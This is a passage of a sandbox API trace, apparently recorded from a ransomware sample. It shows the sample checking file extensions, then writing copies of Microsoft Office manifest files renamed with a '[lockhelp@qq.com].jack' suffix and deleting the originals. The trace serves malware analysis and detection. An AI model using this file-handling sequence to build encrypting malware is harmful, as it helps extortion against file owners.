Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString=".zip") returned 4 [0203.858] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.858] lstrlenW (lpString=".rar") returned 4 [0203.858] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString=".bz2") returned 4 [0203.858] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString=".7z") returned 3 [0203.858] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString=".dbf") returned 4 [0203.858] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.859] lstrlenW (lpString=".1cd") returned 4 [0203.859] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.859] lstrlenW (lpString=".jpg") returned 4 [0203.859] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.859] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0203.859] lstrlenW (lpString="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 53 [0203.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0203.994] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0203.994] CloseHandle (hObject=0x3b8) returned 1 [0203.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 0x220 [0203.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0203.994] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.994] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0203.994] GetLastError () returned 0x0 [0203.994] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0204.269] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0204.272] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.272] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.273] SetEndOfFile (hFile=0x43c) returned 1 [0204.273] CloseHandle (hObject=0x43c) returned 1 [0204.275] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.275] SetEndOfFile (hFile=0x3b8) returned 1 [0204.276] CloseHandle (hObject=0x3b8) returned 1 [0204.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 1 [0204.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.277] lstrlenW (lpString=".doc") returned 4 [0204.277] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.277] lstrlenW (lpString=".docx") returned 5 [0204.277] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.277] lstrlenW (lpString=".pdf") returned 4 [0204.278] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString=".xls") returned 4 [0204.278] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString=".xlsx") returned 5 [0204.278] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.278] lstrlenW (lpString=".ppt") returned 4 [0204.278] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.278] lstrlenW (lpString=".zip") returned 4 [0204.278] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.278] lstrlenW (lpString=".rar") returned 4 [0204.278] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString=".bz2") returned 4 [0204.278] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString=".7z") returned 3 [0204.278] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.278] lstrlenW (lpString=".dbf") returned 4 [0204.278] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.278] lstrlenW (lpString=".1cd") returned 4 [0204.279] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".jpg") returned 4 [0204.279] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".doc") returned 4 [0204.279] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString=".docx") returned 5 [0204.279] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.279] lstrlenW (lpString=".pdf") returned 4 [0204.279] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString=".xls") returned 4 [0204.279] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString=".xlsx") returned 5 [0204.279] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.279] lstrlenW (lpString=".ppt") returned 4 [0204.279] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".zip") returned 4 [0204.279] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.279] lstrlenW (lpString=".rar") returned 4 [0204.279] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString=".bz2") returned 4 [0204.279] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString=".7z") returned 3 [0204.279] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".dbf") returned 4 [0204.279] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".1cd") returned 4 [0204.279] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0204.279] lstrlenW (lpString=".jpg") returned 4 [0204.279] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.280] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.280] lstrlenW (lpString="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 53 [0204.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0204.281] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0204.281] CloseHandle (hObject=0x3b8) returned 1 [0204.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 0x220 [0204.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0204.281] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.281] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0204.281] GetLastError () returned 0x0 [0204.281] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0204.430] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0204.431] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.431] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.431] SetEndOfFile (hFile=0x43c) returned 1 [0204.431] CloseHandle (hObject=0x43c) returned 1 [0204.432] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.432] SetEndOfFile (hFile=0x3b8) returned 1 [0204.432] CloseHandle (hObject=0x3b8) returned 1 [0204.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 1 [0204.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.433] lstrlenW (lpString=".doc") returned 4 [0204.433] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.433] lstrlenW (lpString=".docx") returned 5 [0204.433] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.433] lstrlenW (lpString=".pdf") returned 4 [0204.433] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.433] lstrlenW (lpString=".xls") returned 4 [0204.433] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.433] lstrlenW (lpString=".xlsx") returned 5 [0204.433] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.433] lstrlenW (lpString=".ppt") returned 4 [0204.433] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.433] lstrlenW (lpString=".zip") returned 4 [0204.433] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.433] lstrlenW (lpString=".rar") returned 4 [0204.434] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".bz2") returned 4 [0204.434] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".7z") returned 3 [0204.434] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString=".dbf") returned 4 [0204.434] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString=".1cd") returned 4 [0204.434] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString=".jpg") returned 4 [0204.434] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString=".doc") returned 4 [0204.434] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".docx") returned 5 [0204.434] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.434] lstrlenW (lpString=".pdf") returned 4 [0204.434] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".xls") returned 4 [0204.434] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".xlsx") returned 5 [0204.434] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.434] lstrlenW (lpString=".ppt") returned 4 [0204.434] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.434] lstrlenW (lpString=".zip") returned 4 [0204.434] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.434] lstrlenW (lpString=".rar") returned 4 [0204.434] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".bz2") returned 4 [0204.434] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.434] lstrlenW (lpString=".7z") returned 3 [0204.435] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.435] lstrlenW (lpString=".dbf") returned 4 [0204.435] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.435] lstrlenW (lpString=".1cd") returned 4 [0204.435] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 104 [0204.435] lstrlenW (lpString=".jpg") returned 4 [0204.435] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.435] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.435] lstrlenW (lpString="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 53 [0204.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0204.436] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=763363) returned 1 [0204.436] CloseHandle (hObject=0x3b8) returned 1 [0204.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 0x220 [0204.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0204.436] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.436] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0204.437] GetLastError () returned 0x0 [0204.437] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xba5e3, lpOverlapped=0x0) returned 1 [0204.590] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xba5f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xba5f0, lpOverlapped=0x0) returned 1 [0204.607] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.607] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.607] SetEndOfFile (hFile=0x43c) returned 1 [0204.607] CloseHandle (hObject=0x43c) returned 1 [0204.995] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.995] SetEndOfFile (hFile=0x3b8) returned 1 [0205.002] CloseHandle (hObject=0x3b8) returned 1 [0205.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.002] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 1 [0205.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.002] lstrlenW (lpString=".doc") returned 4 [0205.003] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString=".docx") returned 5 [0205.003] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.003] lstrlenW (lpString=".pdf") returned 4 [0205.003] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString=".xls") returned 4 [0205.003] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString=".xlsx") returned 5 [0205.003] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.003] lstrlenW (lpString=".ppt") returned 4 [0205.003] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.003] lstrlenW (lpString=".zip") returned 4 [0205.003] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.003] lstrlenW (lpString=".rar") returned 4 [0205.003] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString=".bz2") returned 4 [0205.003] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString=".7z") returned 3 [0205.003] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.003] lstrlenW (lpString=".dbf") returned 4 [0205.003] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.003] lstrlenW (lpString=".1cd") returned 4 